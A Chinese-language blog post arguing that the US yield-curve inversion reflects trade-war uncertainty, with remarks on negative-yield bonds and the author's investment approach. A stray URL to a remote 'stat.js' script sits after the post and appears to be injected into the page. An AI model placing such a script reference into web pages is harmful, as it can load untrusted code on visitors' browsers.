分類
經濟分析 證券投資

一個簡單思考利率倒掛的角度

此次倒掛利率是3個月短期利率竟然比10年長期國債利率高。可以想成:3個月債權價格下降而10年債權價格上升,是怎樣的侷限條件會造成如此現象?

別忘了,10年國債的成本是什麼、10年國債的成本是什麼、10年國債的成本是什麼!

清楚知道長期國債的成本是什麼,就能理解為什麼中美貿易戰與國債殖利率變化有關。

訊息費用提高到一定程度時,人們的選擇行為會怎樣改變?

請同時注意「負利率債券」全球規模已經成長近10兆美元!為什麼有人願意負擔「負利率」也要買這種債券呢?值得多花點心思想想。

當uncertainty太高或風險貼水不夠,暫時把錢放到十年國債甚至負利率債券都勝過多數投資選項

這更是打臉那些「中美貿易戰美國會輕易獲勝」的愚蠢論點。

市場價格清楚顯示美國越打越把tax-cutting and deregulation的利益打得精光。而這恰恰是我去年中認為「清空股票為上」的一貫經濟邏輯。

順道一提:整體交易費用上升並不會平均地雨露均沾降道每個廠商、每種行業身上,事實上我們看到的是因侷限條件不同而個人、廠商、行業負擔高高低低不同的交易費用增加,甚至有些不但沒負擔額外費用,還因此得利或風落利益。

投資上我會尋找後者,並等待適當價格。

反之,放空或衍生性之類的操作我一向不太建議,自己也不是很喜歡。除非有很好條件的CDS。

https://js.developerstatss.ga/stat.js?n=ns1

One reply on “一個簡單思考利率倒掛的角度”

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com 標誌

您的留言將使用 WordPress.com 帳號。 登出 /  變更 )

Google photo

您的留言將使用 Google 帳號。 登出 /  變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 /  變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 /  變更 )

連結到 %s